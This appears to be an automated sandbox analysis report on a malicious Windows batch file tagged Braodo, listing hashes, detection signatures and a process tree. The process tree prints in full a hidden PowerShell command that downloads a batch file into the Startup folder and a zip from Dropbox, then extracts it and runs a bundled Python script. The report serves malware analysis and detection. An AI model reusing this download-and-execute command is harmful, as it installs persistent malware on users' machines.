Windows
Analysis Report
zW72x5d91l.bat
Overview
General Information
Field | Value |
---|---|
Sample name | zW72x5d91l.bat (renamed because the original name is a hash value) |
Original sample name | 25d7e9a512fccb4b87bc53a2dd939b823513333882852f833025601e71fa0746.bat |
Analysis ID | 1571738 |
MD5 | c72963263d76893234b3b6c6342bdbbc |
SHA1 | 55e01fd1eb905383222abe3a914adcde1f21558c |
SHA256 | 25d7e9a512fccb4b87bc53a2dd939b823513333882852f833025601e71fa0746 |
Tags | bat, Braodo, user-JAMESWT_MHT |
Infos | |
Detection
Field | Value |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 2988 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zW72x5d91l.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3348 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/xgyxbty4c17yg95ziuhf5/T1.zip?rlkey=zhc1rx2g0o7knrhq4xj62yw3w&st=xde91yel&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- python.exe (PID: 7036 cmdline: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py MD5: A7F3026E4CF239F0A24A021751D17AE2)
- cmd.exe (PID: 4920 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 1604 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton |
Source: | Author: Florian Roth (Nextron Systems) |
Source: | Author: Florian Roth (Nextron Systems) |